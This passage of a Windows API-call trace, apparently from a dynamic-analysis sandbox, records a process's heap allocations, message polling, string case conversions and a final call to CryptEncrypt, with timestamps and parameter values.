wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf158) returned 0 [0113.204] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a72558 [0113.204] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x20) returned 0x2a782a0 [0113.205] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x4) returned 0x2a71a88 [0113.205] CharUpperBuffW (in: lpsz="A1A0070620F", cchLength=0xb | out: lpsz="A1A0070620F") returned 0xb [0113.205] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a782a0 | out: hHeap=0x2af0000) returned 1 [0113.205] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a71a88 | out: hHeap=0x2af0000) returned 1 [0113.205] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0xc) returned 0x2aaa468 [0113.205] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x40) returned 0x2a74280 [0113.205] PeekMessageW (in: lpMsg=0x8ced58, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8ced58) returned 0 [0113.205] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a71b98 [0113.205] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a71b58 [0113.205] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaa438 [0113.205] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaa4e0 [0113.205] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a719c8 [0113.205] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaa4f8 [0113.205] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a719c8 | out: hHeap=0x2af0000) returned 1 [0113.205] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x4) returned 0x2a71ac8 [0113.205] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x20) returned 0x2a78188 [0113.205] CharUpperBuffW (in: lpsz="SSA1A0070620F", cchLength=0xd | out: lpsz="SSA1A0070620F") returned 0xd [0113.205] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a78188 | out: hHeap=0x2af0000) returned 1 [0113.205] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a71ac8 | out: hHeap=0x2af0000) returned 1 [0113.205] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaa4f8 | out: hHeap=0x2af0000) returned 1 [0113.205] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaa4e0 | out: hHeap=0x2af0000) returned 1 [0113.205] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaa438 | out: hHeap=0x2af0000) returned 1 [0113.205] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a71b58 | out: hHeap=0x2af0000) returned 1 [0113.205] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a71b98 | out: hHeap=0x2af0000) returned 1 [0113.205] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x38) returned 0x2a5e680 [0113.205] PeekMessageW (in: lpMsg=0x8ced58, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8ced58) returned 0 [0113.205] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a5e680 | out: hHeap=0x2af0000) returned 1 [0113.205] PeekMessageW (in: lpMsg=0x8ced58, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8ced58) returned 0 [0113.205] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a71a58 [0113.206] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a71a48 [0113.206] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaa2b8 [0113.206] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaa2e8 [0113.206] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a71b08 [0113.206] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaa4f8 [0113.206] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a71b08 | out: hHeap=0x2af0000) returned 1 [0113.206] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaa4f8 | out: hHeap=0x2af0000) returned 1 [0113.206] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaa2e8 | out: hHeap=0x2af0000) returned 1 [0113.206] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaa2b8 | out: hHeap=0x2af0000) returned 1 [0113.206] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a71a48 | out: hHeap=0x2af0000) returned 1 [0113.206] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a71a58 | out: hHeap=0x2af0000) returned 1 [0113.206] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a74280 | out: hHeap=0x2af0000) returned 1 [0113.206] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaa468 | out: hHeap=0x2af0000) returned 1 [0113.206] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a71b68 [0113.207] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x18) returned 0x29f6f20 [0113.207] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaa2a0 [0113.207] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaa2b8 [0113.207] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a71a18 [0113.207] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaa2d0 [0113.207] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a71a18 | out: hHeap=0x2af0000) returned 1 [0113.207] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaa2d0 | out: hHeap=0x2af0000) returned 1 [0113.207] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaa2b8 | out: hHeap=0x2af0000) returned 1 [0113.207] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaa2a0 | out: hHeap=0x2af0000) returned 1 [0113.207] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x29f6f20 | out: hHeap=0x2af0000) returned 1 [0113.207] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a71b68 | out: hHeap=0x2af0000) returned 1 [0113.207] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a72558 | out: hHeap=0x2af0000) returned 1 [0113.207] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x38) returned 0x2a5e9c0 [0113.207] PeekMessageW (in: lpMsg=0x8cf158, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf158) returned 0 [0113.207] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a5e9c0 | out: hHeap=0x2af0000) returned 1 [0113.207] PeekMessageW (in: lpMsg=0x8cf158, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf158) returned 0 [0113.207] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x20) returned 0x2a77fd0 [0113.207] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x4) returned 0x2a72558 [0113.207] CharUpperBuffW (in: lpsz="A5C00800A45", cchLength=0xb | out: lpsz="A5C00800A45") returned 0xb [0113.207] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a77fd0 | out: hHeap=0x2af0000) returned 1 [0113.207] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a72558 | out: hHeap=0x2af0000) returned 1 [0113.207] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0xc) returned 0x2aaa2d0 [0113.207] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x40) returned 0x2a74280 [0113.208] PeekMessageW (in: lpMsg=0x8ceef8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8ceef8) returned 0 [0113.208] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a72558 [0113.208] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a71b08 [0113.208] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaa378 [0113.208] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaa390 [0113.208] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a71b58 [0113.208] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaa468 [0113.208] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a71b58 | out: hHeap=0x2af0000) returned 1 [0113.208] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x4) returned 0x2a71b18 [0113.208] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x20) returned 0x2a78390 [0113.208] CharUpperBuffW (in: lpsz="SSA5C00800A45", cchLength=0xd | out: lpsz="SSA5C00800A45") returned 0xd [0113.208] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a78390 | out: hHeap=0x2af0000) returned 1 [0113.208] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a71b18 | out: hHeap=0x2af0000) returned 1 [0113.208] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaa468 | out: hHeap=0x2af0000) returned 1 [0113.208] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaa390 | out: hHeap=0x2af0000) returned 1 [0113.208] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaa378 | out: hHeap=0x2af0000) returned 1 [0113.208] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a71b08 | out: hHeap=0x2af0000) returned 1 [0113.208] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a72558 | out: hHeap=0x2af0000) returned 1 [0113.208] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x38) returned 0x2a5e880 [0113.208] PeekMessageW (in: lpMsg=0x8ceef8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8ceef8) returned 0 [0113.208] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a5e880 | out: hHeap=0x2af0000) returned 1 [0113.208] PeekMessageW (in: lpMsg=0x8ceef8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8ceef8) returned 0 [0113.208] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a72558 [0113.208] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaa498 [0113.208] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaa4f8 [0113.208] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a71a48 [0113.208] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaa3f0 [0113.208] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a71a48 | out: hHeap=0x2af0000) returned 1 [0113.208] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaa3f0 | out: hHeap=0x2af0000) returned 1 [0113.209] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaa4f8 | out: hHeap=0x2af0000) returned 1 [0113.209] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaa498 | out: hHeap=0x2af0000) returned 1 [0113.209] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a72558 | out: hHeap=0x2af0000) returned 1 [0113.209] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a72558 [0113.209] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaa4c8 [0113.209] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaa450 [0113.209] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a71b58 [0113.209] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaa2e8 [0113.209] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a71b58 | out: hHeap=0x2af0000) returned 1 [0113.209] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaa2e8 | out: hHeap=0x2af0000) returned 1 [0113.209] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaa450 | out: hHeap=0x2af0000) returned 1 [0113.209] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaa4c8 | out: hHeap=0x2af0000) returned 1 [0113.209] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a72558 | out: hHeap=0x2af0000) returned 1 [0113.209] PeekMessageW (in: lpMsg=0x8ceef8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8ceef8) returned 0 [0113.209] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a74280 | out: hHeap=0x2af0000) returned 1 [0113.209] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaa2d0 | out: hHeap=0x2af0000) returned 1 [0113.209] PeekMessageW (in: lpMsg=0x8cf158, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf158) returned 0 [0113.209] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a72558 [0113.209] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a72558 | out: hHeap=0x2af0000) returned 1 [0113.209] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a5de40 | out: hHeap=0x2af0000) returned 1 [0113.209] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaa078 | out: hHeap=0x2af0000) returned 1 [0113.209] PeekMessageW (in: lpMsg=0x8cf3b8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf3b8) returned 0 [0113.209] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x38) returned 0x2a5e940 [0113.209] PeekMessageW (in: lpMsg=0x8cf3b8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf3b8) returned 0 [0113.209] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a72558 [0113.209] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a71a18 [0113.209] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x29f71e0 | out: hHeap=0x2af0000) returned 1 [0113.209] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a71a18 | out: hHeap=0x2af0000) returned 1 [0113.210] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a72558 | out: hHeap=0x2af0000) returned 1 [0113.210] PeekMessageW (in: lpMsg=0x8cf3b8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf3b8) returned 0 [0113.210] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a5e8c0 | out: hHeap=0x2af0000) returned 1 [0113.210] PeekMessageW (in: lpMsg=0x8cf3b8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf3b8) returned 0 [0113.210] CharUpperBuffW (in: lpsz="A4F00A00447", cchLength=0xb | out: lpsz="A4F00A00447") returned 0xb [0113.210] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a78390 | out: hHeap=0x2af0000) returned 1 [0113.210] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a71a48 | out: hHeap=0x2af0000) returned 1 [0113.210] PeekMessageW (in: lpMsg=0x8cef58, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cef58) returned 0 [0113.210] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a719f8 | out: hHeap=0x2af0000) returned 1 [0113.210] CharUpperBuffW (in: lpsz="SSA4F00A00447", cchLength=0xd | out: lpsz="SSA4F00A00447") returned 0xd [0113.210] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a78318 | out: hHeap=0x2af0000) returned 1 [0113.210] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a71a48 | out: hHeap=0x2af0000) returned 1 [0113.210] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaa378 | out: hHeap=0x2af0000) returned 1 [0113.210] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaa318 | out: hHeap=0x2af0000) returned 1 [0113.210] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaa360 | out: hHeap=0x2af0000) returned 1 [0113.210] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a71a18 | out: hHeap=0x2af0000) returned 1 [0113.210] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a71a08 | out: hHeap=0x2af0000) returned 1 [0113.210] PeekMessageW (in: lpMsg=0x8cef58, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cef58) returned 0 [0113.210] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a5e6c0 | out: hHeap=0x2af0000) returned 1 [0113.210] PeekMessageW (in: lpMsg=0x8cef58, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cef58) returned 0 [0113.258] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a719d8 | out: hHeap=0x2af0000) returned 1 [0113.258] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaa408 | out: hHeap=0x2af0000) returned 1 [0113.259] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaa4f8 | out: hHeap=0x2af0000) returned 1 [0113.259] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaa3a8 | out: hHeap=0x2af0000) returned 1 [0113.259] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a71b28 | out: hHeap=0x2af0000) returned 1 [0113.259] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a71a88 | out: hHeap=0x2af0000) returned 1 [0113.259] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a5de40 | out: hHeap=0x2af0000) returned 1 [0113.259] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaa348 | out: hHeap=0x2af0000) returned 1 [0113.259] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a71ae8 | out: hHeap=0x2af0000) returned 1 [0113.259] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a719b8 | out: hHeap=0x2af0000) returned 1 [0113.259] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a719d8 | out: hHeap=0x2af0000) returned 1 [0113.259] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a71b58 | out: hHeap=0x2af0000) returned 1 [0113.259] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaa078 | out: hHeap=0x2af0000) returned 1 [0113.259] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a71a68 | out: hHeap=0x2af0000) returned 1 [0113.259] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a719a8 | out: hHeap=0x2af0000) returned 1 [0113.259] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a71ae8 | out: hHeap=0x2af0000) returned 1 [0113.259] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaa4c8 | out: hHeap=0x2af0000) returned 1 [0113.259] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaa2d0 | out: hHeap=0x2af0000) returned 1 [0113.259] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaa498 | out: hHeap=0x2af0000) returned 1 [0113.259] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a719e8 | out: hHeap=0x2af0000) returned 1 [0113.259] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a719e8 | out: hHeap=0x2af0000) returned 1 [0113.259] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a78430 | out: hHeap=0x2af0000) returned 1 [0113.259] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a71b58 | out: hHeap=0x2af0000) returned 1 [0113.259] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a71b98 | out: hHeap=0x2af0000) returned 1 [0113.259] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a71b98 | out: hHeap=0x2af0000) returned 1 [0113.259] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaa510 | out: hHeap=0x2af0000) returned 1 [0113.259] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaa258 | out: hHeap=0x2af0000) returned 1 [0113.260] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaa348 | out: hHeap=0x2af0000) returned 1 [0113.260] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a71ae8 | out: hHeap=0x2af0000) returned 1 [0113.260] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a71b38 | out: hHeap=0x2af0000) returned 1 [0113.260] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a71ab8 | out: hHeap=0x2af0000) returned 1 [0113.260] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaa258 | out: hHeap=0x2af0000) returned 1 [0113.260] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaa528 | out: hHeap=0x2af0000) returned 1 [0113.260] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaa480 | out: hHeap=0x2af0000) returned 1 [0113.260] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a71a68 | out: hHeap=0x2af0000) returned 1 [0113.260] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a71b28 | out: hHeap=0x2af0000) returned 1 [0113.260] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a719c8 | out: hHeap=0x2af0000) returned 1 [0113.260] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x37d3e50 | out: hHeap=0x2af0000) returned 1 [0113.261] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a719d8 | out: hHeap=0x2af0000) returned 1 [0113.261] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaa390 | out: hHeap=0x2af0000) returned 1 [0113.261] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaa3f0 | out: hHeap=0x2af0000) returned 1 [0113.261] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a719e8 | out: hHeap=0x2af0000) returned 1 [0113.261] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a71a88 | out: hHeap=0x2af0000) returned 1 [0113.261] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a5de40 | out: hHeap=0x2af0000) returned 1 [0113.261] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a71aa8 | out: hHeap=0x2af0000) returned 1 [0113.261] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaa348 | out: hHeap=0x2af0000) returned 1 [0113.261] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaa3f0 | out: hHeap=0x2af0000) returned 1 [0113.261] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaa2d0 | out: hHeap=0x2af0000) returned 1 [0113.261] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a71b38 | out: hHeap=0x2af0000) returned 1 [0113.261] CharLowerBuffW (in: lpsz="bool", cchLength=0x4 | out: lpsz="bool") returned 0x4 [0113.261] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaa390 | out: hHeap=0x2af0000) returned 1 [0113.261] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a71b18 | out: hHeap=0x2af0000) returned 1 [0113.261] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaa2d0 | out: hHeap=0x2af0000) returned 1 [0113.261] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a71b68 | out: hHeap=0x2af0000) returned 1 [0113.261] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaa408 | out: hHeap=0x2af0000) returned 1 [0113.261] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a71b08 | out: hHeap=0x2af0000) returned 1 [0113.261] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaa2d0 | out: hHeap=0x2af0000) returned 1 [0113.261] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a71aa8 | out: hHeap=0x2af0000) returned 1 [0113.261] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaa3a8 | out: hHeap=0x2af0000) returned 1 [0113.261] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a71a48 | out: hHeap=0x2af0000) returned 1 [0113.261] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaa348 | out: hHeap=0x2af0000) returned 1 [0113.261] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a71a68 | out: hHeap=0x2af0000) returned 1 [0113.261] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaa3a8 | out: hHeap=0x2af0000) returned 1 [0113.261] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a719d8 | out: hHeap=0x2af0000) returned 1 [0113.261] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="CryptEncrypt", cchWideChar=13, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 13 [0113.261] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="CryptEncrypt", cchWideChar=13, lpMultiByteStr=0x2aaa3a8, cbMultiByte=13, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="CryptEncrypt", lpUsedDefaultChar=0x0) returned 13 [0113.262] CryptEncrypt (in: hKey=0x9a47c0, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x0*, pdwDataLen=0x8cef60*=0x13dfb, dwBufLen=0x0 | out: pbData=0x0*, pdwDataLen=0x8cef60*=0x13e00) returned 1 [0113.262] PeekMessageW (in: lpMsg=0x8cf3b8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf3b8) returned 0 [0113.262] PeekMessageW (in: lpMsg=0x8cf3b8, hWnd=0x0, 